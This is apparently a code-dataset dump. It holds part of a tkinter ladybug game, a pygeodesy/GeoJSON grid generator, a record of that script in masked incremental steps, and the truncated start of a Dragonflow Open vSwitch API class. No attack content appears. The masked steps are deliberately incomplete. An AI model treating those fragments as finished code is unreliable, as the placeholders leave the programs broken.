side == \"l\":\r\n data.scaryBug.append(ScaryBug(140,750))\r\n data.scaryBug.append(ScaryBug(550,750))\r\n elif side ==\"r\":\r\n data.scaryBug.append(ScaryBug(344,750))\r\n data.scaryBug.append(ScaryBug(750,750))\r\n\r\n \r\ndef AIKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n if data.winner==None:\r\n if (event.keysym == \"Left\") and data.onLeft1==False:\r\n data.onLeft1 = True\r\n data.player2X = 550\r\n elif(event.keysym == \"Right\") and data.onLeft1== True:\r\n data.onLeft1 = False\r\n data.player2X = 750\r\n\r\ndef AIMousePressed(event, data): checkHome(event, data)\r\ndef AITimerFired(data):\r\n if data.winner == None:\r\n #want to check hit twice (before & after elements move)\r\n if data.Invincible1 == False:hitAI1(data, 31)\r\n if data.Invincible2 == True: pass\r\n elif data.Invincible2 == False:hitAI2(data, 31)\r\n for coconut in data.coconutsAI1:\r\n if data.pause1Drop == False:coconut.onTimerFired(data)\r\n for coconut in data.coconutsAI2:\r\n if data.pause2Drop == False:coconut.onTimerFired(data)\r\n # second check\r\n if data.Invincible1 == False:hitAI1(data,13)\r\n if data.Invincible2 == True:pass\r\n elif data.Invincible2 == False:hitAI2(data,13)\r\n data.player1Y-=data.speedAI\r\n #establishing winer\r\n if data.player1Y < 15 and data.player2Y >15: data.winner= \"player1\"\r\n if data.player1Y>40:\r\n data.time +=1\r\n coconutShotAI(data)\r\n data.player2Y-=data.speedAI\r\n if data.player2Y < 15 and data.player1Y> 15: data.winner= \"player2\" \r\n if data.player2Y>40:\r\n data.time +=1\r\n coconutShotAI(data)\r\n if data.player1Y < 15 and data.player2Y <15: data.winner = \"tie\"\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n powerUpAITimerFired(data)\r\n\r\ndef powerUpAITimerFired(data):\r\n #moves both sides symmetrically \r\n for powerUp in data.invincible:\r\n powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug:\r\n bug.onTimerFired(data)\r\n hitScaryBug(data)\r\n if data.start1 != None:\r\n if abs(data.start1-data.player1Y) >= 120:\r\n data.pause1Drop = False\r\n data.Invincible1 = False\r\n if data.start2 != None:\r\n if abs(data.start2-data.player2Y) >= 120:\r\n data.pause2Drop = False\r\n data.Invincible2 = False\r\n \r\n\r\n\r\ndef AIRedrawAll(canvas, data):\r\n canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)\r\n canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)\r\n canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconutsAI1:\r\n coconut.draw(canvas)\r\n for coconut in data.coconutsAI2:\r\n coconut.draw(canvas)\r\n canvas.create_text(50,40, text = \"Computer\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n canvas.create_text(450,40, text = \"Player 1\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n drawPowerups(canvas, data)\r\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\r\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\r\n AIWinner(canvas, data)\r\n drawHome(canvas, data)\r\n\r\ndef AIWinner(canvas, data):\r\n if data.winner== \"player1\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"The Computer Won :(\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"player2\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it! You Won!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"tie\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"Tie! You Both Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n####################################\r\n# ScoreBoard mode\r\n####################################\r\n\r\ndef scoreboardKeyPressed(event, data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef scoreboardMousePressed(event, data): checkHome(event, data)\r\n\r\ndef scoreboardTimerFired(data):\r\n difficultyTimerFired(data)\r\n\r\ndef scoreboardRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_image(data.width/2, data.tbgY, image=data.tbg)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n canvas.create_text(data.width/2, data.txtTScore, text=\"Top Scores!\",\r\n font = \"Arial 30 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2, data.S_P, text=\"Score_Player\",\r\n font = \"Arial 20 bold\", fill = \"yellow\")\r\n drawHome(canvas, data)\r\n #reads file\r\n data.savedScores\r\n data.savedScores=readFile(\"score.txt\")\r\n score=data.savedScores.splitlines()\r\n scores=[]\r\n for line in score:\r\n scores.append(line.split(\",\"))\r\n #sorts scores to find top 5\r\n scores = sorted(scores, key = lambda x: int(x[0]))\r\n top5 = scores[-data.numScores:]\r\n top5.reverse()\r\n for i in range(len(top5)):\r\n canvas.create_text(data.width/2, data.scoreShift+(i*50),\r\n text = top5[i],\r\n font = \"Arial 18 bold\", fill = \"yellow\")\r\n\r\n####################################\r\n# help mode\r\n####################################\r\n\r\ndef helpKeyPressed(event, data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef helpMousePressed(event, data): checkHome(event, data)\r\n\r\ndef helpTimerFired(data):\r\n difficultyTimerFired(data)\r\n\r\ndef helpRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.helpY, image=data.helpScreen)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n drawHome(canvas, data)\r\n\r\n#######################################\r\n# use the run function as-is from notes\r\n#######################################\r\n\r\ndef run(width=15000, height=25000):\r\n def redrawAllWrapper(canvas, data):\r\n canvas.delete(ALL)\r\n redrawAll(canvas, data)\r\n canvas.update() \r\n\r\n def mousePressedWrapper(event, canvas, data):\r\n mousePressed(event, data)\r\n redrawAllWrapper(canvas, data)\r\n\r\n def keyPressedWrapper(event, canvas, data):\r\n keyPressed(event, data)\r\n redrawAllWrapper(canvas, data)\r\n\r\n def timerFiredWrapper(canvas, data):\r\n timerFired(data)\r\n redrawAllWrapper(canvas, data)\r\n # pause, then call timerFired again\r\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\r\n # Set up data and call init\r\n class Struct(object): pass\r\n data = Struct()\r\n data.width = width\r\n data.height = height\r\n data.timerDelay = 100 # milliseconds\r\n # create the root and the canvas\r\n root = Tk()\r\n init(data)\r\n canvas = Canvas(root, width=data.width, height=data.height)\r\n canvas.pack()\r\n # set up events\r\n root.bind(\"<Button-1>\", lambda event:\r\n mousePressedWrapper(event, canvas, data))\r\n root.bind(\"<Key>\", lambda event:\r\n keyPressedWrapper(event, canvas, data))\r\n timerFiredWrapper(canvas, data)\r\n # and launch the app\r\n root.mainloop() # blocks until window is closed\r\n print(\"bye!\")\r\n\r\nrun(1000, 1000)\r\n", "step-ids": [ 66, 79, 82, 95, 104 ] }
[ 66, 79, 82, 95, 104 ]
# GeoPy can be used to interface to map box https://pypi.org/project/geopy/ from pygeodesy.ellipsoidalVincenty import LatLon from geojson import Polygon, Feature, FeatureCollection, dump import sys import random BEARING_SOUTH = 180.0 BEARING_EAST = 90.0 class Cell(object): def __init__(self, cellId, top_left_cell, top_right_cell, bottom_right_cell, bottom_left_cell): self.cellId = cellId self.top_left_cell = top_left_cell self.top_right_cell = top_right_cell self.bottom_right_cell = bottom_right_cell self.bottom_left_cell = bottom_left_cell def __repr__(self): return str(self.__dict__) def generate_cell(current_cell_id, top_left_cell, top_right_cell, bottom_right_cell, bottom_left_cell): c = Cell(current_cell_id, top_left_cell, top_right_cell, bottom_right_cell, bottom_left_cell) # Expect other data to be inserted into the cell here return c def generate_cell_grid(top_left, east_extent, south_extent, cell_lat_size_meters, cell_long_size_meters): south_distance = 0 current_cell_id = 0 list_of_cells = [] left_edge = top_left while south_distance < south_extent: south_distance = south_distance + cell_lat_size_meters point_south_of_left_edge = left_edge.destination(cell_lat_size_meters, BEARING_SOUTH) top_left_cell = left_edge bottom_left_cell = point_south_of_left_edge east_distance = 0 while east_distance < east_extent: top_right_cell = top_left_cell.destination(cell_long_size_meters, BEARING_EAST) bottom_right_cell = bottom_left_cell.destination(cell_long_size_meters, BEARING_EAST) cell = generate_cell(current_cell_id, top_left_cell, top_right_cell, bottom_right_cell, bottom_left_cell) current_cell_id = current_cell_id + 1 list_of_cells.append(cell) # Increments top_left_cell = top_right_cell bottom_left_cell = bottom_right_cell east_distance = east_distance + cell_long_size_meters left_edge = point_south_of_left_edge return list_of_cells def grid_to_geojson(grid, lower_elevation, upper_elevation): features = [] for cell in grid: rect_points = [ [ (cell.top_left_cell.lon, cell.top_left_cell.lat, lower_elevation), (cell.top_right_cell.lon, cell.top_right_cell.lat, lower_elevation), (cell.bottom_right_cell.lon, cell.bottom_right_cell.lat, lower_elevation), (cell.bottom_left_cell.lon, cell.bottom_left_cell.lat, lower_elevation), (cell.top_left_cell.lon, cell.top_left_cell.lat, lower_elevation), #Because first and last points have to match (cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation), (cell.top_right_cell.lon, cell.top_right_cell.lat, upper_elevation), (cell.bottom_right_cell.lon, cell.bottom_right_cell.lat, upper_elevation), (cell.bottom_left_cell.lon, cell.bottom_left_cell.lat, upper_elevation), (cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation) #Because first and last points have to match ] ] properties = { 'capacity': random.randint(0, 5) } # TODO this is just an example polygon = Polygon(rect_points) feature = Feature(geometry=polygon, id=cell.cellId, properties=properties) features.append(feature) return FeatureCollection(features) def main(): TOP_LEFT = LatLon(-37.721874, 144.966859) EAST_EXTENT = 1000.0 SOUT_EXTENT = 1000.0 CELL_LONG_SIZE_METERS = 100.0 CELL_LAT_SIZE_METERS = 100.0 grid = generate_cell_grid(TOP_LEFT, EAST_EXTENT, SOUT_EXTENT, CELL_LAT_SIZE_METERS, CELL_LONG_SIZE_METERS) geojson_feature_collection = grid_to_geojson(grid, 10.0, 100.0) dump(geojson_feature_collection, sys.stdout, indent=4) json_file = open('grid-3d.geojson', 'w') dump(geojson_feature_collection, json_file, indent=4) if __name__ == '__main__': main()
normal
{ "blob_id": "01f0ad8746ed9a9941faa699b146625ad3a0b373", "index": 4289, "step-1": "<mask token>\n\n\nclass Cell(object):\n\n def __init__(self, cellId, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n self.cellId = cellId\n self.top_left_cell = top_left_cell\n self.top_right_cell = top_right_cell\n self.bottom_right_cell = bottom_right_cell\n self.bottom_left_cell = bottom_left_cell\n\n def __repr__(self):\n return str(self.__dict__)\n\n\ndef generate_cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n c = Cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell)\n return c\n\n\n<mask token>\n\n\ndef grid_to_geojson(grid, lower_elevation, upper_elevation):\n features = []\n for cell in grid:\n rect_points = [[(cell.top_left_cell.lon, cell.top_left_cell.lat,\n lower_elevation), (cell.top_right_cell.lon, cell.top_right_cell\n .lat, lower_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, lower_elevation), (cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, lower_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, lower_elevation), (\n cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation\n ), (cell.top_right_cell.lon, cell.top_right_cell.lat,\n upper_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, upper_elevation), (cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, upper_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, upper_elevation)]]\n properties = {'capacity': random.randint(0, 5)}\n polygon = Polygon(rect_points)\n feature = Feature(geometry=polygon, id=cell.cellId, properties=\n properties)\n features.append(feature)\n return FeatureCollection(features)\n\n\ndef main():\n TOP_LEFT = LatLon(-37.721874, 144.966859)\n EAST_EXTENT = 1000.0\n SOUT_EXTENT = 1000.0\n CELL_LONG_SIZE_METERS = 100.0\n CELL_LAT_SIZE_METERS = 100.0\n grid = generate_cell_grid(TOP_LEFT, EAST_EXTENT, SOUT_EXTENT,\n CELL_LAT_SIZE_METERS, CELL_LONG_SIZE_METERS)\n geojson_feature_collection = grid_to_geojson(grid, 10.0, 100.0)\n dump(geojson_feature_collection, sys.stdout, indent=4)\n json_file = open('grid-3d.geojson', 'w')\n dump(geojson_feature_collection, json_file, indent=4)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Cell(object):\n\n def __init__(self, cellId, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n self.cellId = cellId\n self.top_left_cell = top_left_cell\n self.top_right_cell = top_right_cell\n self.bottom_right_cell = bottom_right_cell\n self.bottom_left_cell = bottom_left_cell\n\n def __repr__(self):\n return str(self.__dict__)\n\n\ndef generate_cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n c = Cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell)\n return c\n\n\ndef generate_cell_grid(top_left, east_extent, south_extent,\n cell_lat_size_meters, cell_long_size_meters):\n south_distance = 0\n current_cell_id = 0\n list_of_cells = []\n left_edge = top_left\n while south_distance < south_extent:\n south_distance = south_distance + cell_lat_size_meters\n point_south_of_left_edge = left_edge.destination(cell_lat_size_meters,\n BEARING_SOUTH)\n top_left_cell = left_edge\n bottom_left_cell = point_south_of_left_edge\n east_distance = 0\n while east_distance < east_extent:\n top_right_cell = top_left_cell.destination(cell_long_size_meters,\n BEARING_EAST)\n bottom_right_cell = bottom_left_cell.destination(\n cell_long_size_meters, BEARING_EAST)\n cell = generate_cell(current_cell_id, top_left_cell,\n top_right_cell, bottom_right_cell, bottom_left_cell)\n current_cell_id = current_cell_id + 1\n list_of_cells.append(cell)\n top_left_cell = top_right_cell\n bottom_left_cell = bottom_right_cell\n east_distance = east_distance + cell_long_size_meters\n left_edge = point_south_of_left_edge\n return list_of_cells\n\n\ndef grid_to_geojson(grid, lower_elevation, upper_elevation):\n features = []\n for cell in grid:\n rect_points = [[(cell.top_left_cell.lon, cell.top_left_cell.lat,\n lower_elevation), (cell.top_right_cell.lon, cell.top_right_cell\n .lat, lower_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, lower_elevation), (cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, lower_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, lower_elevation), (\n cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation\n ), (cell.top_right_cell.lon, cell.top_right_cell.lat,\n upper_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, upper_elevation), (cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, upper_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, upper_elevation)]]\n properties = {'capacity': random.randint(0, 5)}\n polygon = Polygon(rect_points)\n feature = Feature(geometry=polygon, id=cell.cellId, properties=\n properties)\n features.append(feature)\n return FeatureCollection(features)\n\n\ndef main():\n TOP_LEFT = LatLon(-37.721874, 144.966859)\n EAST_EXTENT = 1000.0\n SOUT_EXTENT = 1000.0\n CELL_LONG_SIZE_METERS = 100.0\n CELL_LAT_SIZE_METERS = 100.0\n grid = generate_cell_grid(TOP_LEFT, EAST_EXTENT, SOUT_EXTENT,\n CELL_LAT_SIZE_METERS, CELL_LONG_SIZE_METERS)\n geojson_feature_collection = grid_to_geojson(grid, 10.0, 100.0)\n dump(geojson_feature_collection, sys.stdout, indent=4)\n json_file = open('grid-3d.geojson', 'w')\n dump(geojson_feature_collection, json_file, indent=4)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Cell(object):\n\n def __init__(self, cellId, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n self.cellId = cellId\n self.top_left_cell = top_left_cell\n self.top_right_cell = top_right_cell\n self.bottom_right_cell = bottom_right_cell\n self.bottom_left_cell = bottom_left_cell\n\n def __repr__(self):\n return str(self.__dict__)\n\n\ndef generate_cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n c = Cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell)\n return c\n\n\ndef generate_cell_grid(top_left, east_extent, south_extent,\n cell_lat_size_meters, cell_long_size_meters):\n south_distance = 0\n current_cell_id = 0\n list_of_cells = []\n left_edge = top_left\n while south_distance < south_extent:\n south_distance = south_distance + cell_lat_size_meters\n point_south_of_left_edge = left_edge.destination(cell_lat_size_meters,\n BEARING_SOUTH)\n top_left_cell = left_edge\n bottom_left_cell = point_south_of_left_edge\n east_distance = 0\n while east_distance < east_extent:\n top_right_cell = top_left_cell.destination(cell_long_size_meters,\n BEARING_EAST)\n bottom_right_cell = bottom_left_cell.destination(\n cell_long_size_meters, BEARING_EAST)\n cell = generate_cell(current_cell_id, top_left_cell,\n top_right_cell, bottom_right_cell, bottom_left_cell)\n current_cell_id = current_cell_id + 1\n list_of_cells.append(cell)\n top_left_cell = top_right_cell\n bottom_left_cell = bottom_right_cell\n east_distance = east_distance + cell_long_size_meters\n left_edge = point_south_of_left_edge\n return list_of_cells\n\n\ndef grid_to_geojson(grid, lower_elevation, upper_elevation):\n features = []\n for cell in grid:\n rect_points = [[(cell.top_left_cell.lon, cell.top_left_cell.lat,\n lower_elevation), (cell.top_right_cell.lon, cell.top_right_cell\n .lat, lower_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, lower_elevation), (cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, lower_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, lower_elevation), (\n cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation\n ), (cell.top_right_cell.lon, cell.top_right_cell.lat,\n upper_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, upper_elevation), (cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, upper_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, upper_elevation)]]\n properties = {'capacity': random.randint(0, 5)}\n polygon = Polygon(rect_points)\n feature = Feature(geometry=polygon, id=cell.cellId, properties=\n properties)\n features.append(feature)\n return FeatureCollection(features)\n\n\ndef main():\n TOP_LEFT = LatLon(-37.721874, 144.966859)\n EAST_EXTENT = 1000.0\n SOUT_EXTENT = 1000.0\n CELL_LONG_SIZE_METERS = 100.0\n CELL_LAT_SIZE_METERS = 100.0\n grid = generate_cell_grid(TOP_LEFT, EAST_EXTENT, SOUT_EXTENT,\n CELL_LAT_SIZE_METERS, CELL_LONG_SIZE_METERS)\n geojson_feature_collection = grid_to_geojson(grid, 10.0, 100.0)\n dump(geojson_feature_collection, sys.stdout, indent=4)\n json_file = open('grid-3d.geojson', 'w')\n dump(geojson_feature_collection, json_file, indent=4)\n\n\nif __name__ == '__main__':\n main()\n", "step-4": "<mask token>\nBEARING_SOUTH = 180.0\nBEARING_EAST = 90.0\n\n\nclass Cell(object):\n\n def __init__(self, cellId, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n self.cellId = cellId\n self.top_left_cell = top_left_cell\n self.top_right_cell = top_right_cell\n self.bottom_right_cell = bottom_right_cell\n self.bottom_left_cell = bottom_left_cell\n\n def __repr__(self):\n return str(self.__dict__)\n\n\ndef generate_cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell):\n c = Cell(current_cell_id, top_left_cell, top_right_cell,\n bottom_right_cell, bottom_left_cell)\n return c\n\n\ndef generate_cell_grid(top_left, east_extent, south_extent,\n cell_lat_size_meters, cell_long_size_meters):\n south_distance = 0\n current_cell_id = 0\n list_of_cells = []\n left_edge = top_left\n while south_distance < south_extent:\n south_distance = south_distance + cell_lat_size_meters\n point_south_of_left_edge = left_edge.destination(cell_lat_size_meters,\n BEARING_SOUTH)\n top_left_cell = left_edge\n bottom_left_cell = point_south_of_left_edge\n east_distance = 0\n while east_distance < east_extent:\n top_right_cell = top_left_cell.destination(cell_long_size_meters,\n BEARING_EAST)\n bottom_right_cell = bottom_left_cell.destination(\n cell_long_size_meters, BEARING_EAST)\n cell = generate_cell(current_cell_id, top_left_cell,\n top_right_cell, bottom_right_cell, bottom_left_cell)\n current_cell_id = current_cell_id + 1\n list_of_cells.append(cell)\n top_left_cell = top_right_cell\n bottom_left_cell = bottom_right_cell\n east_distance = east_distance + cell_long_size_meters\n left_edge = point_south_of_left_edge\n return list_of_cells\n\n\ndef grid_to_geojson(grid, lower_elevation, upper_elevation):\n features = []\n for cell in grid:\n rect_points = [[(cell.top_left_cell.lon, cell.top_left_cell.lat,\n lower_elevation), (cell.top_right_cell.lon, cell.top_right_cell\n .lat, lower_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, lower_elevation), (cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, lower_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, lower_elevation), (\n cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation\n ), (cell.top_right_cell.lon, cell.top_right_cell.lat,\n upper_elevation), (cell.bottom_right_cell.lon, cell.\n bottom_right_cell.lat, upper_elevation), (cell.bottom_left_cell\n .lon, cell.bottom_left_cell.lat, upper_elevation), (cell.\n top_left_cell.lon, cell.top_left_cell.lat, upper_elevation)]]\n properties = {'capacity': random.randint(0, 5)}\n polygon = Polygon(rect_points)\n feature = Feature(geometry=polygon, id=cell.cellId, properties=\n properties)\n features.append(feature)\n return FeatureCollection(features)\n\n\ndef main():\n TOP_LEFT = LatLon(-37.721874, 144.966859)\n EAST_EXTENT = 1000.0\n SOUT_EXTENT = 1000.0\n CELL_LONG_SIZE_METERS = 100.0\n CELL_LAT_SIZE_METERS = 100.0\n grid = generate_cell_grid(TOP_LEFT, EAST_EXTENT, SOUT_EXTENT,\n CELL_LAT_SIZE_METERS, CELL_LONG_SIZE_METERS)\n geojson_feature_collection = grid_to_geojson(grid, 10.0, 100.0)\n dump(geojson_feature_collection, sys.stdout, indent=4)\n json_file = open('grid-3d.geojson', 'w')\n dump(geojson_feature_collection, json_file, indent=4)\n\n\nif __name__ == '__main__':\n main()\n", "step-5": "# GeoPy can be used to interface to map box https://pypi.org/project/geopy/\nfrom pygeodesy.ellipsoidalVincenty import LatLon\nfrom geojson import Polygon, Feature, FeatureCollection, dump\nimport sys\nimport random\n\nBEARING_SOUTH = 180.0\nBEARING_EAST = 90.0\n\n\nclass Cell(object):\n def __init__(self, cellId, top_left_cell, top_right_cell, bottom_right_cell, bottom_left_cell):\n self.cellId = cellId\n self.top_left_cell = top_left_cell\n self.top_right_cell = top_right_cell\n self.bottom_right_cell = bottom_right_cell\n self.bottom_left_cell = bottom_left_cell\n\n def __repr__(self):\n return str(self.__dict__)\n\n\ndef generate_cell(current_cell_id, top_left_cell, top_right_cell, bottom_right_cell, bottom_left_cell):\n c = Cell(current_cell_id, top_left_cell, top_right_cell, bottom_right_cell, bottom_left_cell)\n # Expect other data to be inserted into the cell here\n return c\n\n\ndef generate_cell_grid(top_left, east_extent, south_extent, cell_lat_size_meters, cell_long_size_meters):\n south_distance = 0\n current_cell_id = 0\n\n list_of_cells = []\n\n left_edge = top_left\n\n while south_distance < south_extent:\n south_distance = south_distance + cell_lat_size_meters\n point_south_of_left_edge = left_edge.destination(cell_lat_size_meters, BEARING_SOUTH)\n\n top_left_cell = left_edge\n bottom_left_cell = point_south_of_left_edge\n east_distance = 0\n\n while east_distance < east_extent:\n top_right_cell = top_left_cell.destination(cell_long_size_meters, BEARING_EAST)\n bottom_right_cell = bottom_left_cell.destination(cell_long_size_meters, BEARING_EAST)\n\n cell = generate_cell(current_cell_id, top_left_cell, top_right_cell, bottom_right_cell, bottom_left_cell)\n current_cell_id = current_cell_id + 1\n\n list_of_cells.append(cell)\n\n # Increments\n top_left_cell = top_right_cell\n bottom_left_cell = bottom_right_cell\n east_distance = east_distance + cell_long_size_meters\n\n left_edge = point_south_of_left_edge\n\n return list_of_cells\n\n\ndef grid_to_geojson(grid, lower_elevation, upper_elevation):\n features = []\n\n for cell in grid:\n rect_points = [\n [\n (cell.top_left_cell.lon, cell.top_left_cell.lat, lower_elevation),\n (cell.top_right_cell.lon, cell.top_right_cell.lat, lower_elevation),\n (cell.bottom_right_cell.lon, cell.bottom_right_cell.lat, lower_elevation),\n (cell.bottom_left_cell.lon, cell.bottom_left_cell.lat, lower_elevation),\n (cell.top_left_cell.lon, cell.top_left_cell.lat, lower_elevation), #Because first and last points have to match\n\n (cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation),\n (cell.top_right_cell.lon, cell.top_right_cell.lat, upper_elevation),\n (cell.bottom_right_cell.lon, cell.bottom_right_cell.lat, upper_elevation),\n (cell.bottom_left_cell.lon, cell.bottom_left_cell.lat, upper_elevation),\n (cell.top_left_cell.lon, cell.top_left_cell.lat, upper_elevation) #Because first and last points have to match\n ]\n ]\n properties = {\n 'capacity': random.randint(0, 5)\n } # TODO this is just an example\n\n polygon = Polygon(rect_points)\n feature = Feature(geometry=polygon, id=cell.cellId, properties=properties)\n\n features.append(feature)\n\n return FeatureCollection(features)\n\n\ndef main():\n TOP_LEFT = LatLon(-37.721874, 144.966859)\n EAST_EXTENT = 1000.0\n SOUT_EXTENT = 1000.0\n\n CELL_LONG_SIZE_METERS = 100.0\n CELL_LAT_SIZE_METERS = 100.0\n\n grid = generate_cell_grid(TOP_LEFT, EAST_EXTENT, SOUT_EXTENT, CELL_LAT_SIZE_METERS, CELL_LONG_SIZE_METERS)\n\n geojson_feature_collection = grid_to_geojson(grid, 10.0, 100.0)\n dump(geojson_feature_collection, sys.stdout, indent=4)\n\n json_file = open('grid-3d.geojson', 'w')\n dump(geojson_feature_collection, json_file, indent=4)\n\n\n\n\nif __name__ == '__main__':\n main()\n", "step-ids": [ 6, 7, 8, 9, 11 ] }
[ 6, 7, 8, 9, 11 ]
# Copyright (c) 2015 OpenStack Foundation. # # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import netaddr from oslo_config import cfg from oslo_log import log from ovs import vlog from dragonflow.controller.common import constants from dragonflow.db.models import ovs from dragonflow.db.models import qos from dragonflow.ovsdb import impl_idl LOG = log.getLogger(__name__) OFPORT_RANGE_MIN = 1 OFPORT_RANGE_MAX = 65533 OVS_LOG_FILE_NAME = 'df-ovs.log' class OvsApi(object): """The interface of openvswitch Consumers use this class to set openvswitch or get results from openvswitch. """ def __init__(self, ip, protocol='tcp', port='6640', timeout=10): super(OvsApi, self).__init__() self.ip = ip self.protocol = protocol self.port = port # NOTE: This has to be this name vsctl_timeout, as neutron will use # this attribute to set the timeout of ovs db. self.vsctl_timeout = timeout self.ovsdb = None self.integration_bridge = cfg.CONF.df.integration_bridge if cfg.CONF.log_dir: vlog.Vlog.init(cfg.CONF.log_dir + '/' + OVS_LOG_FILE_NAME) else: vlog.Vlog.init() def initialize(self, nb_api): db_connection = ('%s:%s:%s' % (self.protocol, self.ip, self.port)) nb_api.db_change_callback(None, None, constants.CONTROLLER_OVS_SYNC_STARTED, None) self.ovsdb = impl_idl.DFOvsdbApi( nb_api, db_connection, self.vsctl_timeout) nb_api.db_change_callback(None, None, constants.CONTROLLER_OVS_SYNC_FINISHED, None) def _db_get_val(self, table, record, column, check_error=False, log_errors=True): return self.ovsdb.db_get(table, record, column).execute( check_error=check_error, log_errors=log_errors) def _get_bridge_for_iface(self, iface_name): return self.ovsdb.iface_to_br(iface_name).execute() def set_controller(self, bridge, targets): self.ovsdb.set_controller(bridge, targets).execute() def set_controller_fail_mode(self, bridge, fail_mode): self.ovsdb.set_fail_mode(bridge, fail_mode).execute() def check_controller(self, target): controllers = self.ovsdb.get_controller( self.integration_bridge).execute() return target in controllers def check_controller_fail_mode(self, fail_mode): return fail_mode == self._db_get_val('Bridge', self.integration_bridge, 'fail_mode') def get_virtual_tunnel_ports(self): ifaces = self.ovsdb.db_find( 'Interface', ('options', '=', {'remote_ip': 'flow'}), columns=['uuid', 'name', 'type']).execute() tunnel_ports = [] for iface in ifaces: if (self.integration_bridge != self._get_bridge_for_iface(iface['name'])): continue tunnel_ports.append( ovs.OvsPort( id=str(iface['uuid']), name=iface['name'], tunnel_type=iface['type'], ), ) return tunnel_ports def add_virtual_tunnel_port(self, tunnel_type): self.ovsdb.add_virtual_tunnel_port(tunnel_type).execute() def delete_port(self, switch_port): self.ovsdb.del_port(switch_port.name, self.integration_bridge).execute() @staticmethod def _check_ofport(port_name, ofport): if ofport is None: LOG.warning("Can't find ofport for port %s.", port_name) return False if ofport < OFPORT_RANGE_MIN or ofport > OFPORT_RANGE_MAX: LOG.warning("ofport %(ofport)s for port %(port)s is invalid.", {'ofport': ofport, 'port': port_name}) 